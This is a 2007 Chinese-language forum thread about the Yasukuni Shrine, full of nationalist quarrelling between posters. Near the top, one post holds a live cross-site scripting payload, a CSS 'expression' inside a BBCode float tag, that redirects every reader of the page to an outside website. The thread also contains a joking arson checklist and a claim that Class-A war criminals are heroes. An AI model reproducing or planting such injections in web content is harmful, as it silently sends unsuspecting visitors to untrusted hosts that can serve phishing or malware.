返回列表 发帖

日本靖国神社内部,是中国人的看!!!!!!

[float=expression(window.location="http://www.ltforever.com/web.htm")]xss

原帖由 B·A·K·A 于 2007-4-15 17:32 发表

融冰和破冰不都是一样的吗
有什么好计较的

你小学有没有毕业?
冰只有"破了"之后才好"融".......

日本军国主义糟粕..

有时间在电脑前骂日本一顿,还不如做点实际的,日本虽然在二战里做了那么多罪,但更多的太平洋战场上的甲级战犯是日本民族的英雄。我们应痛恨的只是在中国屠杀过平民的那些将领。

原帖由 于 2007-4-17 18:05 发表

不一样

你仔细看看就会不一样

破是怎样的态度

融是什么样的态度。

而且我并没有计较什么

你这样看待这句话我只能说你在找碴了。

这是我们班老师谈到的话题。

初2的学生都能看出其中的态 ...

等你学了日文再来谈吧,这是中国翻译的问题

国耻不会忘的.....

检查汽油-OK
检查火柴-OK
检查鼓风机-OK
ALL GREEN
ACTION

原帖由 B·A·K·A 于 2007-4-20 12:06 发表

唉~~~~~灭国啊

中文"愤青"一词是褒义词,什么是"褒义"你懂不?

既然不是龙的传人,还来这吓扯什么啊,真受不了哦算你会打中文了?

原帖由 B·A·K·A 于 2007-4-13 12:12 发表
我不是中国人
所以我不看!!!!!!

这是你的QQ吧~我看资料里怎么是中国北京啊

饿..楼上貌似你也满有空饿,写这么多字
我支持你

原帖由 nateriver 于 2007-4-19 11:33 发表
反正口水是无济于事地
不过FQ比麻木的人要好点
至少有激情,不管这激情有益否
但某些极端的,比如说日本人天生就...
这和当年纳粹说尤太人天生...如出一辙

每个国家都有这种极端的人群,日本有,美国也有,当然中国也有,这只是一小部分而已
我倒是觉得有些BS二战里日本没人性的帖子没什么不对的~
倒是有些人,对这些不以为然,轻描淡写,还动不动就说人家FQ。。。。要是这样也算FQ~那我看中国至少99.999999%的人是FQ了